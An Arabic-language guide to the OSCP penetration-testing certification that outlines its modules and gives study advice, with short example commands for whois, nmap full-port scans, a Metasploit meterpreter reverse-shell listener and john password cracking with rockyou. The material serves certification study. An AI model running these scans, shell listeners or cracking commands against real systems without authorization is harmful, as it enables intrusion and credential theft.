شهادة OSCP: دليلك العملي لاختبار الاختراق 2026

ايه هي شهادة OSCP ببساطة؟​

شهادة OSCP (Offensive Security Certified Professional) شهادة عملية جدًا في مجال الاختراق الأخلاقي واختبار الاختراق. مش امتحان نظري - كله تطبيق وتجارب على لابات حقيقية. لو أنت لسه بتبدأ أو حتى عندك شوية خبرة، هتلاقيها بتعلمك ازاي تخترق خطوة بخطوة وتفكر زي الهاكر المسؤول.

ليه الشركات بتحب الـ OSCP؟​

• لأنها عملية: بتخلي اللي معاها يثبت إنه يقدر يختبر نظم فعلاً، مش بس يحكي نظري.
• بتختبر مهارات حقيقية: جمع معلومات، استغلال ثغرات، تنظيف أثر الاختبار (بعضياً) والتعامل مع الأنظمة.
• مناسبة للوظايف: بحطوها في متطلبات وظائف الـ Penetration Tester وRed Team.

محتوى الكورس والموديولات الأساسية (شرح بسيط) ​

BackTrack / Kali Basics​

هتتعلم التعامل مع توزيعة Kali Linux، ازاي تشغل الأدوات الأساسية وتظبط بيئة الاختبار. لو أنت أصلاً شغال على لينكس فده هيسهل عليك ومش هتحتاج تقضي وقت طويل هنا.

Information Gathering Techniques​

جمع المعلومات عن الهدف - مهم جدًا وبيفتحلك طرق للـ exploitation بعدين. أدوات زي whois, dig, enum إلخ.

مثال أوامر سريعة:
# بحث نطاق
whois example.com
# استكشاف DNS
dig +short example.com

Open Services & Port Scanning​

تعرف ايه الخدمات شغالة على الهدف وتفتش البورتات بـ Nmap. ده الجزء اللي بيحددلك خطوط الهجوم.

مثال Nmap:
# سكان كامل بصيغة مفيدة
nmap -sC -sV -oN scan.txt 10.10.10.5

ARP Spoofing​

جزء متوسط/متقدم شوية - مش هتقدر تجربه في كل لابز عشان ممكن يقطع الشبكة، بس مهم تفهمه.

Buffer Overflow Exploitation​

واحد من أقوى الموديولات - هتتعلم استغلال ثغرات الذاكرة على Windows وLinux. محتاجة صبر وممارسة، لكن ممتعة جدًا. لو حابب مراجع، شوف محتوى Corelan والمواقع التعليمية المتخصصة.

Working With Exploits & Exploit Frameworks​

هتعرف تزبط وتعدل إكسبلويتات، وتستخدم Metasploit لما يكون مناسب.

مثال تشغيل Metasploit:

msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
run

Client Side Attacks & Password Attacks​

طرق استهداف المستخدمين وكسر كلمات المرور (brute-force / wordlists). مهم تبقى عارف أدوات زي hydra, john, وhashcat.

Web Application Attack Vectors​

مقدمة عن ثغرات الويب - مهم لو ناوي تتخصص في Web Penetration Testing. لو عايز تتعمق انسخ طريقك على كتاب "Web Application Hacker’s Handbook".

Trojans, Rootkits, Windows Oddities​

نظرة على أدوات وأفكار لاستهداف أنظمة Windows وأدوات زي الرووتكيتس (بس دراسة مش تطبيق عشوائي).

Final Challenges​

امتحان عملي: لابز بتحتاج تحلها وتطلع صلاحيات أعلى - هنا يظهر الفرق بين اللي فهم ونفّذ واللي حفظ بس.

نصايح عملية للنجاح في OSCP ​

• اشتغل كتير على لابات عملية - الممارسة أهم حاجة.
• اتعلم لينكس كويس.
• اتعود تستخدم الـ Nmap وتحلل نتائجها مش بس تشغلها.
• ابدأ بــ Buffer Overflow لو ناوي تتعمق، اقرا Corelan وجرّب أمثلة بسيطة أول.
• خلي عندك قائمة أدوات جاهزة (wordlists, exploit-db, metasploit).
• دون كل حاجة - السجلات والملاحظات بتسهل عليك الامتحان والتقارير.

أمثلة كود صغيرة توضّح شغلك العملي​

مثال: فحص سريع ببعض الخيارات المهمة في Nmap​

nmap -Pn -sS -sV -A -p- 10.10.10.5 -oN full_scan.txt

(يعني: ما تعملش ping، SYN scan، كشف النسخ، اكتشاف الخدمات والـ OS، وفحص كل البورتات).

مثال: توليد كلمة سر بالقاموس مع John (بسيط)​

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt

الخلاصة - هل OSCP مناسبة ليك؟​

لو إنت عايز تبقى PenTester عملي أو تخش مجال الـ Red Team أو حتى تطور مهاراتك في الأمن السيبراني بجدية، فـ OSCP ممتازة جدًا. هتديك تجربة تطبيقية صعبة ومفيدة، وهتخليك جاهز لسوق الشغل أكتر من شهادات نظرية بحتة.